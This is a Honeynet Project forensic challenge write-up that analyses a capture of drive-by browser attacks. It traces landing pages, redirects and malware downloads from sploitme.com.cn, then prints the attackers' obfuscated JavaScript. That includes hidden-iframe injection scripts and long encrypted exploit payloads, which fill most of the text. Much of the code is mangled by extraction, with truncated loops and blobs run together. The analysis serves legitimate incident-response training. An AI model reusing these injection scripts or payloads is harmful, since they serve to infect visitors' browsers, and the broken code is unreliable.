Know Your Enemy

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Challenge 2: Browsers under attack (intermediate)

Submission Template

Submit your solution at http://www.honeynet.org/challenge2010/ by 17:00 EST, Monday, March 1st 2010. Results will be released on Monday, March 15th 2010.

Name (required): Rani Hod Email (required): [email protected] Country (optional): Israel Profession (optional): X Student _ Security Professional _ Other

Question 1. List the protocols found in the capture. What protocol do you think the attack is/are based Possible Points: 2pts on? Tools Used: Wireshark Awarded Points: Answer 1. ARP, DHCP, DNS, HTTP, NETBIOS.

The attacks are HTTP-based since everything else is in the background: DNS was used to resolve webserver names; ARP and DHCP were used once per client computer; Netbios announcements were issued by client computers and got no response.1

1 The attacker can potentially derive information from these, but is more likely using the user-agent sent with HTTP requests. The work is licensed under a Creative Commons License. Copyright © The Honeynet Project, 2010 Page 1 of 18 T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Question 2. List IPs, hosts names / domain names. What can you tell about it - extrapolate? Possible Points: 4pts Tools Used: Wireshark Answer 2.

The good,

IP(s) Name Role 10.0.2.15 8fd12edd2dc1462 Client #1 10.0.3.15 8fd12edd2dc1462 Client #2 10.0.4.15 8fd12edd2dc1462 Client #3 10.0.5.15 8fd12edd2dc1462 Client #4 10.0.2.2 (unknown) DHCP server 10.0.3.2 10.0.4.2 10.0.5.2 192.168.1.1 (unknown) DNS server

The bad,

IP Name Role 192.168.56.50 rapidshare.com.eyu32.ru Landing website #1 192.168.56.51 shop.honeynet.sg Landing website #2 192.168.56.52 sploitme.com.cn Malware distribution website 64.236.114.1 www.honeynet.org Malware C&C server 

And Google.

IP(s) Name(s) Role 74.125.77.101 www.google-analytics.com 74.125.77.102 209.85.227.99 www.google.com 209.85.227.100 www.google.fr 209.85.227.106 clients1.google.fr

Comments:  The clients are most likely VMs, as each has its own subnet, but they share a hostname, a DNS server (single MAC address, multiple IPs per subnet) and a DHCP server (on a different subnet).  Landing and malware distribution sites reside in the same private subnet. Not a real-world scenario.  Landing site #1 is probably a ripoff of the well-known rapidshare.com.  Landing site #2 is an e-commerce site, either innocent (but exploited to serve malicious JS) or malevolent.

Question 3. List all the web pages. List those visited containing suspect and possibly malicious Possible Points: 6pts javascript and who's is connecting to it? Briefly describe the nature of the malicious web pages Tools Used: Wireshark, Google Answer 3.

Website Pages accessed Accessed by rapidshare.com.eyu32.ru /login.php Client #1; Client #2 (twice) shop.honeynet.sg /catalog/ Client #3 sploitme.com.cn /?click=3feb5a6b2f Client #1; Client #2 (twice) /?click=84c090bd86 Client #3 /fg/directshow.php Client #3 /fg/load.php?e=1 Client #2 (twice); Client #3 (twice) /fg/load.php?e=3 Client #3 /fg/show.php Client #4 /fg/show.php?s=3feb5a6b2f Client #1; Client #2 (twice) /fg/show.php?s=84c090bd86 Client #3 www.honeynet.org / Client #2; Client #3 (twice) www.google-analytics.com /__utm.gif?utmwv=4.6.5&utmn=1731245256&… Client #2; Client #3 (twice) www.google.com / Client #2 www.google.fr / Client #2 /csi?v=3&s=webhp&action=&… Client #2 clients1.google.fr /generate_204 Client #2 (Omitted: irrelevant requests to CSS and images on rapidshare.com.eyu32.ru and shop.honeynet.sg) rapidshare.com.eyu32.ru/login.php This is a rip-off of an equivalent page on rapidshare.com. It seems that the page was saved using a spider that messed up the relative urls to images defined in the CSS file, causing 404 errors. The page contains a bit of javascript, obfuscated using Dean Edwards's packer. It adds to the page an iframe pointing to sploitme.com.cn/?click=3feb5a6b2f. shop.honeynet.sg/catalog/ This page states that is was generated by a CMS called osCommerce Online Merchant, version 2.2 RC2a. It seems legiti- mate2, except for a very short javascript excerpt, obfuscated using an add-a-constant-to-each-chararcter "encryption". It adds to the page an iframe pointing to sploitme.com.cn/?click=84c090bd86. sploitme.com.cn/?click=X Redirects (using 302) to sploitme.com.cn/fg/show.php?s=X. sploitme.com.cn/fg/show.php (with or without ?s=X) Although the HTTP request succeeds (200), the text in this page says "404 Not Found", and it is most probably styled like the real 404 error page served by splotme.com.cn. Alas, this page may additionally contain an obfuscated JS code that tries to exploit vulnerabilities in the client's browser. sploitme.com.cn/fg/directshow.php Not HTML, but rather a malformed JPEG, used in a couple of the exploits. sploitme.com.cn/fg/load.php?e=X Not HTML, but rather a malware executable. All exploits strive to download this file to a temporary location and execute it.

2 Yes, I saw your "Hi there!" remark. The work is licensed under a Creative Commons License. Copyright © The Honeynet Project, 2010 Page 3 of 18 T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Question 4. Can you sketch an overview of the general actions performed by the attackers? Possible Points: 2pts Tools Used: Wireshark Answer 4.

1. One or many landing sites are initialized with a short, typically obfuscated, javascript code that adds to the document a hidden iframe pointing to sploitme.com.cn/?click=X. These are either malicious web sites, maintained by the attacker, or innocent web sites, exploited by her (e.g., using SQL injection or XSS techniques). 2. A client surfs to a landing site and so his browser requests sploitme.com.cn/?click=X. This request is redirect- ed to sploitme.com.cn/fg/show.php?s=X, the entry point of the main exploit page. I guess the reason for this redirection is to have the ability to change the address of the main exploit page (for load balancing or as a result of updating the exploits suite used). 3. Examining the user-agent string, landing site and other parameters, show.php decides which exploits to embed (again, as obfuscated javascript) in the fake 404 page served. 4. The client's browser executes the javascript. Some of the exploits, such as the DirectShow exploit, require further requests. 5. If any of the exploits is successful, the client's computer downloads and executes a file served at sploitme.- com.cn/fg/load.php?e=X. In our case, the malware is always the same, so the purpose of the extra parameter is to let the attacker know which exploit succeeded. 6. The malware does bad stuff, e.g., turns the client's computer into a bot for sending spam. In our case, the malware accesses www.honeynet.org.

Question 5. What steps are taken to slow the analysis down? Possible Points: 2pts Tools Used: mostly Python Answer 5.

 The javascript is obfuscated using a simple encoding (hex, utf8 or base64) and/or encryption, which are decoded and/or decrypted before execution. An obfuscation technique not used here is polymorphic javascript.  The shellcode itself is handcrafted, but it is neither obfuscated nor contains anti-debugging tricks (thanks ).  If show.php is accessed directly (as client #4 does), the fake 404 text may hide the fact that this URL is valid.  As we can see in packet 366, show.php doesn't try to exploit the same client twice (perhaps by IP, perhaps by other means) so further accesses get a "clean" 404 fake page.3

3 It is still a fake as the response code stays 200. The work is licensed under a Creative Commons License. Copyright © The Honeynet Project, 2010 Page 4 of 18 T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Question 6. Provide the javascripts from the pages identified in the previous question. Decode/de- Possible Points: 8pts obfuscate them too. Tools Used: Python, http://dean.edwards.name/unpacker/ Answer 6. rapidshare.com.eyu32.ru/login.php Original eval(function(p,a,c,k,e,r){e=function(c){return(c35? String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c] ||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.rep lace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('q.r(s("%h%0%6%d%e%7%1%8%9%d%3%4%a%5%2%2%i%j%b%b%9%i%c %k%0%2%7%1%l%3%k%7%l%3%m%b%t%3%c%0%3%u%4%v%6%1%f%w%e%x%f%y%6%a%z%0%g%2%5%4%n%8%5%1%0%A%5%2%4%n%8%9%2%o%c%1%4%a%B%0%9%0%f%0%c%0%2%o%j%8%5%0%g %g%1%m%a%p%h%b%0%6%d%e%7%1%p%C"));',39,39,'69|65|74|63|3D|68|66|6D|20|73|22|2F|6C|72|61|62|64|3C|70|3A| 6F|2E|6E|31|79|3E|document|write|unescape|3F|6B|33|35|36|32|77|67|76|0A'.split('|'),0,{})); Unpacked document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%70%6C%6F%69%74%6D%65%2E%63%6F%6D%2E %63%6E%2F%3F%63%6C%69%63%6B%3D%33%66%65%62%35%61%36%62%32%66%22%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D %22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A")); Decoded document.write() shop.honeynet.sg/catalog Original var s="=jgsbnf!tsd>#iuuq;00tqmpjunf/dpn/do0@dmjdl>95d1:1ce97#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;! ijeefo#?=0jgsbnf?";m="";for(i=0;i) sploit.com.cn/fg/show.php (Firefox) This was served to Client #1 and Client #4, whose user-agent string claims the browser is Firefox. See packets 63 and 722. Original var CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxy z0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,en c4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)| enc4;output=output+String.fromCharCode(chr1);if(enc3!=64) {output=output+String.fromCharCode(chr2);} if(enc4!=64){output=output+String.fromCharCode(chr3);}} output=CRYPT._utf8_decode(output);return output;},_utf8_decode:function(utftext){var string=' ';var i=0;var c=0,c1=0,c2=0,c3=0;while(i191)&&(c<224)) {c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)| (c2&63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.from CharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}} return string;},obfuscate:function(str){var container='';for(var i=0,z=0;i

712018220022319221212612213017014421018421120110414013014618017522919519010616815618819022219117416817212916618312816822319615215116316011516818817122317612213219315715817922818918911816515715518715120319417615 615319115319118120115915215112520112217117318815920410412819016615515023119619115215716315414914921119419316114115112417619822319220915312118517215518919215820114017320314317920519219017215713916813713620618919 021911014313213711919016420921414313719012217117318815920410412819016615515023119619115215716315414914921119419316114115112417619822319220915312118517215518822221220216211120416512119116218221115713216613617518 620017616815812916618312819016417615114210418517816118422216120312512813516812217522220518710217117215517020420117515213013715414911920018418021115214216817517015219521717813717013915612117116219515315616517215 017915621619415211012119117518017618618021115213813012416921120022120112016220315715918316320521210515915913414415621321518917313019112419019120115821412616118213715716818722117615811119115719215823620317411010 515817713721221317416016314417014917319020121820715412213018714521118716317615817016015615918322518221312715818017615321921218920616513015315717519918618421112813819818816118918322320210314019915713820523120619 017316915715118721320421120717414417013618820022319222515212513918417015120019119314115813014715514921918318612616618311814520921417818917415218713311920022419221113210513117516917319221420410412819016714318723 5204208119163171154191223204190219110156163179139199164155222151125168115161184217218182172115143')); Decoded & decrypted function Complete(){setTimeout('location.href = "about:blank',2000);} function CheckIP(){var req=null;try{req=new ActiveXObject("Msxml2.XMLHTTP");}catch(e) {try{req=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){try{req=new XMLHttpRequest();}catch (e){}}} if(req==null)return"0";req.open("GET","/fg/show.php? get_ajax=1&r="+Math.random(),false);req.send(null);if(req.responseText=="1"){return true;}els e{return false;}} Complete(); sploit.com.cn/fg/show.php?s=3feb5a6b2f (IE) This was served to Client #2, whose user-agent string claims the browser is IE 6. See packet 174. Original var CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxy z0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,en c4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)| enc4;output=output+String.fromCharCode(chr1);if(enc3!=64) {output=output+String.fromCharCode(chr2);} if(enc4!=64){output=output+String.fromCharCode(chr3);}} output=CRYPT._utf8_decode(output);return output;},_utf8_decode:function(utftext){var string=' ';var i=0;var c=0,c1=0,c2=0,c3=0;while(i191)&&(c<224)) {c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)| (c2&63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.from CharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}} return string;},obfuscate:function(str){var container='';for(var i=0,z=0;i

%this.signature.length,z%this.signature.length+1).charCodeAt(0));} return CRYPT.decode(container);}} eval(CRYPT.obfuscate('157181187231195154135166180117123204195156160169153153187179201185191214128142198189161189196191200140103190165122187162181170153169180117149205214177211171152187120182200223192212126122130170144210184211201104140130 1461801752291951901061681561881902221911741681721291661831281682231961521511631601151681881712231761221321931571581792281891891181651571551871512031941761561531911531911812011591521511252011221711731881592041041281901661551502311961911521571631541491492111941931611411511241761982 2319220915312118517215518919215820114017320314317920519219017215713916813713620618919021911014313213711919016420921414313719012217117318815920410412819016615515023119619115215716315414914921119419316114115112417619822319220915312118517215518822221220216211120416512119116218221115 7132166136175186200176168158129166183128190164176151142104185178161184222161203125128135168122175222205187102171172155170204201175152130137154149119200184180211152142168175170152195217178137170139156121171162195153156165172150179156216194152110121191175180176186180211152138130124 1692112002212011201622031571591831632052121051591591341441562132151891731301911241901912011582141261611821371571681872211761581111911571921582362031741101051581771372122131741601631441701491731902012182071541221301871452111871631761581701601561591832251822131271581801761532192121 8920616513015315717519918618421112813819818816118918322320210314019915713820523120619017316915715118721320421120717414417013618820022319222515212513918417015120019119314115813014715514921918318612616618311814520921417818917415218713311920022419221113210513117516917319221420410412 8190167143187235204208119163171154191223204190219110156163179121190202179206153142156182171172171215200140174190147154201225206175135173161172127219213157169168152132175119199201191220142104139183147210192223179103144192143121221232195190134171181138175220194156188110131165166126 2012231762241261251721791691722002231921401031901471542011632051741351581821381562182041942071611282041831802012011592091531251901851692061801742021621401861671421871941811741091691801721791562142151731741271541401281992241922181511221981151702112221612021591032001431781792351961 9012310217215212820621121518915915414917118817620215520914214216417316816821821417814117013913418020922318117012317515715518714921321621110815318811618917722118422414314115211516118617121120016214018816713820523118217015216415715512020720319418515915114917117917620222216015513519 4179161206217210202158162137167143175167207154126111180188124169213215189157154153153151190223218211142105163178169206233216177174173192141192209171195153123102171117174212204189211108156170115146198201195214126142155179172152196227204141170203147158157231188153139102166117145214 2041931811011291491661811771851582151551411601711711721922171781241391941681221501711732121611631571341412221891942191011531921751262002201552211291611821751711701712112001621401881671382052311821701521641571551202072031941851591511491711791762022221601551351941791612062172102021 5816213716714317516720715412611118018812417320419418513314319117917919016518721415115919012416015118415419210315719315715420916920819110112918117615714921419417717012715414012620319521821215314113517317117222222420115812015416519220521818119116910417115514420421322815212115319115 3175201185192183128125151182145150214190192104128194166143182231191153157162180138190211189190219103143170140174199236155171152163168171171172200186178124123197141119171183190151135121158175149149213215189157152165166183180165196207152159148175151189191223185140107132164159175232 2042121021621801771522121881551691741521321451792001651832131281381981171601891872092041241582031471581541632041741721091821761412221871771771651521881161791772212141511431411301781451501961761871391191921421542162241941731721641571171612132121771891701431691161791801651882241541 4219811916817318716320116214013314014120519219017215710218213913718420419417310214417014511917618121315815513519417316018919621220012015819014215921716220521316110918313817522219419315616115420313313719016518821515316316815615515118821919314013213014213820119220319013117518011814 9219204216184170141151116148184184188188138121181179150152162181192103124130156121204225196186161109183138175222194193156161154203133137190165188215153163168156155151188219193140132130142138201192191152157132166135144218199156189174154191153192188183155180136124164152156168213218 1821041031391341802092231811701231061791391442132132151891011541701411881761821712151321051861781702061672242021241401991421382011861881891341641581391572222121781851711441911751861911972262121421412021891611842211812041241582031431811792222042121341651801771572162121732101081541 9113719217418519621515112516817316915116715419314010713014715920522520520810617517215514922021215615617514416714118919118621315815117513515217218918021418313712313716519215419220415313516216215114815621222715613315315315318817618121315815117513515517021022215419313615819116415822 1222195153110171182138157218214173210108152203120155190202196211139125139138168188234214178124128194165176220235181187169176158175145150212211207158151169119186178181213158155135194176171188167212203124162200165176167230196174123160157134179156214215173174127153174128178182222153 1421421551701691511882191931401321301661931502311961911521571631551452222031942101641281331831381831822131531341761671161492061621561811381232041431551702341881711181701611511742231951891511721311511441901791831961711301601901371482232041631771741731921681191751831851871431221601 5115615119019019210213516614418717819817617213012113012015016919217217913711920114819316616218821013017516115215622319221615116313014916712618219917915613416116013715317019522218513813113314915414916218415113817415815117822319121217616913615014913717822017522213116015111814818518 3156205136153197141122216233183171118104164173136223191227151172131150132190177198171222130122147183152223179225180120102201144139166233183171118173159135136220192174193110128203186181202236171222130122172138148169192172179137119201144139166230183171118173159134120169191174168172 1301661321901781821712221301221471861481691791541811631021921431382011691842121381761591731361521911771721691322041561211911811541511431411671171471852171571821401311981571421782341962121221071591541522222042151801751561651661861751652211531311221511151491851832271841581031491461 5520016618218713410315915215221719519016912213314911614218216219617213516015918915318521722818010113213914119222022420722515312516015214415219621219217513016715619017922119521913112215918914818416215818413712713214315517823618518813817315911514822019519118817513615411518117718120 6158130122171118148207192176180121161198149177183182183208101102159117148153190190206175132166170187178182214174134102163187153170187225181175143132169154200229180154168104159189179172192228176102136187115191182220180172129138163119148223183222184137162153149138149166184225134106 1601351701511931741761721311661331281752352252131541021561331481691831581811371611351431551711831872091301701601351532101931891511051311301401191771981871531301381631161491701911581811221281531461431492241821701531091641351371691911742031221321661561871791621831531321371301151481 4920322617913812713014815516623018320913912516015214022119119119311913518813612420319720521812710519813715017019217418410113615114917615018218718712610615815115215419221517616913518813212017818115415313417614711815222322115618015913513314517817517118022417317118215419121618919021 9104151153175186191197210221142163194175160152196228190103162182142159217164195191126157171151120218214193223168133132175180176185163208150163168173171173192204200139102199166122187219205154135175179154124211189174168168131165174128181197206158127175190122160185163213201103132131 1651581872312061701061601811761572052141771891231521531531871912011591511281211821851602102262141921041351921421552172181822131311621821361411492141781771651431921531191911972092131421042021711701521922181931201531971411211792292051531611611611721702152121561771661441691451192001 6322221514113713518917118818822820312512819416518020022518318617317217117618320920315718517514113217517117722322621115116318211516816816222617813616113716915818722920515313910918213914515421515617211015219115312217418317620915312519011716118721818619216216619015612218222520415312 7167172154149149213155219165142165174126203201184207153125160178146172199218204104103139134180209223181174122166183118153222215194219103143170140174190220155171152163168171171172200186178124123197141120201198195154127166181139152218199156207161152153186181176198222215143159186172 1461892302181931581581541651922052181811861611091791541602121951562071611431321831451861812092151281421981351691511632252011241401301571542042261851541021621801391492092151561731711521541671831992231762191521211851791501521621812021621401301671591752311791751351751821541561562161 9415211014313213711919016420921414313719012217318916218120013616919614612214918919519011016918211717921820319315217212914917412620319521821215314113517317117222222420115812018616512122116520319010615818015513621218919421910115319217512620122317622412612513917216820716321320110313 2131165158187231206170106160181176157205214177189123152153153187191201159151128121182185160210226214192104135192142155217221204153131103180154157218214173156158152132149124177223176222152125168184161170192217200140174189142142158219203208160109180117145214190215211160134165167145 1871642142201341411311861521881921542001411441901541382001692041531271671581771712132041781851641341651661911752362222211421631931841681722002181931031581301471542002341802251691721711761822182041771731011431661151811772191632101501421561751601521962282001241111331431811672252051 7015210918011714521419021518116814317014519319820118716012710416018217015122221318215911913514515518718018722514217515815214517219121318816913215114513818219715516913016115512014718618315618010114313314519317518318417114312216417217015621421517317412715414518219120122621814210413 9174161185163155201162140204156121171233196186156159156155157169191174180175128170152123182220195151127142167189148169195225177141139201148193200166180191138102159135175168188194188105135188133139175202191223134176181186145189199158184160124151141159186233185171138106156155156220 1931911891201281701521191781822101701271421671191531691911541771411391331481931822331801911381031611351751681881941881031351661451391752021911521341381631151451892001761801601352021411591871841832091271211561551571711952282071201281701521191832211921701271421671161482072001721771 4114015214815520423618019113810616115115615118819418817213215015212017520219115213117616711714518919915718017515814914115918616618720913112215615515622319122820210112817015219017823620515512714216711614920820322817714113913314517720518118019113817315918914422018819418817513113015 6193175202191151132139159120145189199154180137139201141159186236183151123123156155156223192213193124128170153138183198172174127142167186148223183154177141140153144177178166180191138173161135170149188194189121136189144191175202191222130176148136145189199154180122144148141159187184 1882101391211561551562231952121881051281701521221791991951551271421671161531861991551771411391301451772051811801911381731591891441491881941881031321891441931752021912221341761861341451891991581841591351341411591862341872251381041561551571701912281681751281701521901791822101701271 4216718614822321817217714113913114917817823618019113810315913515717118819418810513615114419317520219122213212218213614518919915518015913913314115918623618315112610615615515615319519118111912817015314118018219217012714216813815320818322717714114015314917819118518019113912215913514 8222188194189124132204171138175202192169135139171188145189200173182121136153141159186235188187142103156155156152193174192102128170152121179221176170127142167117149207221158177141140149144140171181180191138106163151161169188194188106133151152190175202191153132122167186145189199156 1851371441531411591861641841711271241561551561521921901921051281701521211822362052241271421671161491692041751771411391341491561741661801911381731641511531711881941891241361891531391752021912221311221671161451891991551801211612041411591871821831711301761561551561501911741881721281 7015212318222019115312714216718614916919915517714114015014417720423618019113810615918917117218819418817513116714419217520219115213012216718814518919922818116012713414115918623518820912312015615515717219621220217212817015219017918219115212714216718914822320017317714113913114511919 1185180191139121161135156151188194189124136166174123175202191222135138186133145189199155181138144153141159186163184225118102156155157171196213176105128170153141178183184173127142168138153207203225177141139201145139186163180191138105160135160153188194188104131150166119175202191224 1351601601331451891991571801751281531411591861641872251521731561551561511931901931241281701521211831822051511271421671881531852031551771411391321491771902361801911381751641511611701881941881031361661561931752021911531311601561381451891992271851591431331411591861641882091431221561 5515615119217419217312817015212217818218017312714216711814816920315817714113913214515517918518019113817615918914917018721121010815419113719217418518021514310415618216915119222018314114019915715917922019519111916215713414420921419016915913115314417920119817220913012515917214618523 0156192141127185164142187218196174139175181117179155204190151174131150183121190202179206152104202171160151230228202124124188157155150225196190123161172155145223211194215161129133145182191201226218142104139174161184167221193140107192167142204169206153157166180138156212203215211163 1431911871891901642212201511251681841611521962171831251321971561581792282051541191581711171562132032152111631431911871891901642212171331411561791611511882212011031321961461221912182052081191631791541912162032152231711431321821281902232142131421632021851601512292232021041401871661 2218323520319010616415713513621621315622315714313218319320018517620914313718912217121018422717612412819716512117922818619012716617211714521621215618116713019214512019022418415115216319018416122221722517912412819415712117522920415313116815817619120921221520310115114911619319918517 6209150105160186160188192214178137170133164142209229196186157159180138128207211227156168144169120181201185209217152104202171160151230228202124124188157155220233207171134173159135136220189193177168152132145185181201180218151104160181146151188221201103132196142121191226204174173159 1801381282072112282191031431701401741992011922191511051561201511881672142031741201481661811752182071861561661611171612192132112071031431701401741981981542221321041891231492072031561821031611961421922091692041901391701801181451542011562111531341691411861991641842171281051601781611 8823422119210311118915715521717117321213517217111815721720419315610113019216719219820218821112812118112315614919218918613912016714014222121820421215310317115417120919418917714013519014517720022321422215312115511014522222116119312411118816715815022220421313417118211814521321417718 8164128132141189191220155225153126156179169210213217180137135201144138221163204212139176171117141220204189206158128169157180174219213215126121197170170152196227200140107192142139170233183171118169182154124209213156181157153153152182174219191222142175155179146184213218182103136200 1561221872301961901061021581771712222111941851611291491671451871642142201341411311861521881921542001411441901541381541822041531061041721551451491962152111681441651331761991641952181301372011871471691832211801361732021411922081691961741101601821541202092122161841701541331411832011 8519121412710219015516818816717220114112014815612218322620621213914315817414921921221619316115319214914219820122621112612515618516120623322617912112319714415422023418217112216415715118720821215618110215216915318820118115915415216319011516118421721618613915419416517817123020517212 3160182138179151204192206170135132124188201223192224153123172179169172199209192162111191143139170229183186172174158135140216191189202165133132149189190165192219143141135115147211214227200141136190142138201188192153161171163154120220195193181101151170157179188181159171151104135117 1611891881541851621621971571541672192041531421691591501902211901741721681311651861911752352131581431251391731711881632142011631351991671221752262061741381651561891902191991541811361371681331561812192052151321051311731601891962122001201581901421592171711732121351661811761572072141 7818116415213316618217619822216012016317211616921019215420014011119914014218322620521213916018213914921221215720216412917018312119020217920615210418617516917223421220110313619014715918723119619113116017115513720918917317616115416714419017823618321115313818613414920719521420313713 1201145139166222206187119122160189174209214190184172133151140179201198210170130123159175171185184174181175119190167155205181187188134162182151136153192190206161154166132124183199179211153138163186150170187214203137158151144193182222206187153122160135136209214190188105133151140179 2011981961691301021591751711852001721811211351901671561862351881711221621821521562221912131761611541671531391801831792111531381641381531861872142031371392031451561702222061881391201611351482092141902061061321661561792011981711511311381671751711851991571811371431901671552002361851 7212616218215117516819115418016115416614419317923618721115313814718914922321721420313713913214917717822220618715210416113614420921419016817513118813217920119818322513516015917517118519515918417516119016715518223418418711816218215114822319519118416115416614412118322119521115313915 6137148170203214203137119204144155182222206188142175159189174209214190168105132204148179201199184174134176151175171185179228180122135190167155182233188210122162182152157172196191176161154166145138179198209211153138181116153207217214203137140152149155186222206187134104161136144209 2141901681751311881481792011981951531341761591751711851801741821221271901671552051811841711561621821511411691921901921611541671481931781821832111531381471151501701872142031371192041461401702222061871391251631891482092141901881721321671521792011982101721341761591751711851791581811 0113519016715518623518418715216218215114822319521220616115416617113718216217521115313916711914918618721420313814415314815517422220618814312516417416020921419118017213120414017920119919515413212315517517118618417618515912719016715617416618417214216218215114517119221218816115416616 6123179220191211153138171117152186187214203137143132146155204222206188126173163152144209214190207119132189144179201198213155135138147175171185203158181137119190167155191184184210142162182151160149191213188161154166166120179220209211153138172135149223187214203137139130145178182222 2061871571241631731742092141901691231321511521792011991961741351391591751711851791541811371391901671551862331851871301621821521482201912281801611541661521901791981712111531381861341491852032142031371191301451551862222061881301751611351482092141902061751321301561792011981832231341 7615517517118519922518113712719016715517816418720915616218215114517219119117216115416715714217923617121115313814711514918519921420313713120414515617422220618713810516417416020921419117610513216615617920119919617313213818517517118518017618212212319016715518616318821014216218215115 6152191174184161154167153142182220209211153139167186152149199214203138144153145177166222206187118102160151156209214190202101132188170179201198205222131176163175171185188177180101123190167155200236183210142162182151161169192228168161154166156124179221195211153138172136149223195214 2031371281521451771862222061871431251601731482092141901771231321891481792011981961731311601591751711852031561801601431901671551751851842091521621821511611721922131801611541661561191792201752111531381811861482081992142031371532011451772042222061871421031591151602092141901801011311 3014817617619822215314214215517016021022221619216217420015612121617120619010616218111714920521317718816412718715312018019817115613012116811615018517915918012012719414612219121820520811916517215414120820419417717515117017917918119817922213210517217117020618022820112412418816412217 9233195190131162162154175209203193185161153192145183202223191217152104186175169172234212201103136190143180221222204212153102179135187152211177211168144165171176198201206208151125139173168222167221193140107192167142204170205153173158171117187223213177173159144165175176198201206208 1511251391731682222291631921621621921561802212321951531681091821761412221871771931651521531871761991851632091501761311721681882142112011241111881641921542362061901271761821391452132122152021641311491871931991851762091501051601861601881922141781371701321561591742171952121731721711 1718615820321521116314319118718919016422122015210516817217015219622720014010719214213916622919521216116417117619121920315621817015215315318819116518821412914216018216018819222020210412018615612118622618515415316517915419120918917717716815213214518517722322621115116318211516816823 0228201124124188164122179233195190131162162135137153192174168172131150132183202164180218151104160181151188188221201103132196142121175229204153131168157117161213212177223158152153124177198236222160120164172171170206180222193140103200166181208171204212139105155136141222213215173106 1291491741261912231632241281261721711702061802181831371191371641552202361841871181091791501862151891942191691441691161892002242142011501401301241602102342241921031691961661212052222041741731601801171532091931571511281541541411242021651962071521591481851602102251631931241111881671 5815022220421313417117111814520920319418516113616918717919920119222015312118517716915118821919314013213014119220816919617411016018215412020921221618417014319112417820219715920715212614817516921019617420012416219715713820523219521216416616111712820621121115610415116914911919818215 4213130137181122169151188219179162158190164158201225206171101164159150170156212156177166130191149175201185175160127175134185161172222227193140132130166121205232206224106173179139136211193156160158151187120177199185176225152104190174151184214212201125132194157139212233185187138103 1631521481511912111521201361881411411771981881711341611511831521851881731821361031481451771791851842251521751641351521511951541921631331331451792011841882151511411681851711891952171761621621911401382051822031741391601791151791821891732101651552031331391991641552221511251681151611 8421721818217412013914014218722920515313815718318813722321221517317215313217118920118120921513217514812414420623322618012111920114215521717119515312310217111717421220418921110815313212017520018618421415110516317814618523016320513416619116715815422020617416117218017213722321221517 3172153132171189201181209215154105172171170206180158182104144186166176167232195212164109182176141222187177152106143132137192200236155220143142181170152189188227192141161193142155217230207190131158181177149199191176151110128132144125177163172224151104182188160188162209185162162197 1571591782321901541391021801381282192112271691231551541331921912021842251291051821711602061672142041241391921461211501671951531231751811161862212021901511631441501781891861861802211431051561711691841801772001401741901661921581942061911351691801171282151871751891051531541411792001 6518322115310415217214721020015819313615313716515920922019519112717616918914520119418920316113318712415220022316321315216315218314417020421820112414020414311915816320617417317218011718620419619420717215319115319320023516315414214115518416118921821417717517013016618120916920621212 3175155138128206211212152170144170166174182201184151150142172175158170171211200162140188167138204224205153106173182177170218199156156157153154145182199165187206139163190175171151200227176122132200165181183235204153172171159150170213193157152159143170149177198181210211128142198115 1702112221612031621242031401421582192032091021611801171491502121931891701541491201772002231922071531251681371691722002221931401071301421382012321952121651621711181522111891902191711431911781882001641921511341421641151702102222112031411361901421382012202041741231761811171792081882 2722216314313218719319820118715713516014813714916918817518113711919814419319016618722410117415915215222019019117312213315013618717818217216913012315912014817019617418212213513514119220816920415312716715817714920921417517310115415414118319022419215114313718517716818819521617912015 4200156180212224181187169172171176182218213156189101135170149119200223214208153142164175146168214157200140136130164138200229180225122164157151187219203215214170153132153119182202188151152163190172171189196214178120154193157158209224203175134164158134170221188227210108144153124177 2012011552111511641631841602101712132041361071861661431672222042121351221791381792162041732071711431911781831801651552091421421641731681682182141781411701391691522131622052131611091791541602122121561771661341651671691991641802161431411601151591842132182041031442001661762051661791 7416117115513812015420315617317415320317512619916418021613314113517517122218017219210413619416718018720319015312716717215414914918917320317515219213312120123515918715116315218617015121822420312012016916415818716519619112615716311712821821417817717115214911919117523521315815316315 2188144172188155193159103198168158179218205213131152183137119156212156177166130190179189199164154160130122198185160210225223188103158200167119154218206212161164171155153213212156156120154170149119199164159225133141172171169173192214182103111187164176154180204174173172182115149219 2122161851611551541491491912011591521331411721711691731922141821031111871641761541982042121231731811171752192141761691571541531701281751642101511531261471211472221712282021241742001641591832301961861061601801171192182031561551711441911661891991851632071431211351861681731791531931 3710213214119321716220521316110918011714521419021318117115217013319219120218422514314116414816018919621718314012813115717721723219521216417116713914521321221618513715219113719020016421022115312118517915015220421020215812020416518116722220417413917017215412414919419318517114313315 